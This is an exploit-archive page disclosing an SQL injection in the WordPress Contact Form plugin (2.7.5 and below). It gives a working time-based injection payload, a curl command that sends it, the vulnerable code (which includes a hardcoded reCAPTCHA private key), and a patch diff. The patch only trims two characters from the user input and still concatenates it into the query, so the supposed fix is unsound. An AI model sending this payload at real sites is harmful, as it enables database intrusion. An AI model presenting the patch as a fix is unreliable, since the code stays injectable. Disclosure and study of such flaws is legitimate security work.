exploit the possibilities

WordPress Contact Form 2.7.5 SQL Injection / Patch

WordPress Contact Form 2.7.5 SQL Injection / Patch
Posted Oct 14, 2011
Authored by Skraps

WordPress Contact Form plugin versions 2.7.5 and below suffer from a remote SQL injection vulnerability. A patch is included.

tags | exploit, remote, sql injection
MD5 | 45618e3593eb3c3739b9db1eeab3c557

WordPress Contact Form 2.7.5 SQL Injection / Patch

Change Mirror Download
# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

---------------
Vulnerable code
---------------
Line 49:
public function the_content($content) {
global $wpdb;
global $table_name;
global $settings_table_name;

$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {

$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig 2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php 2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

$continue = true;

--- 54,63 ----
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

$continue = true;

***************
*** 71,80 ****
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$_POST['wpcf_easyform_formid']."
ORDER BY position
");

--- 73,82 ----
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$wpcf_easyform_formid."
ORDER BY position
");



Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close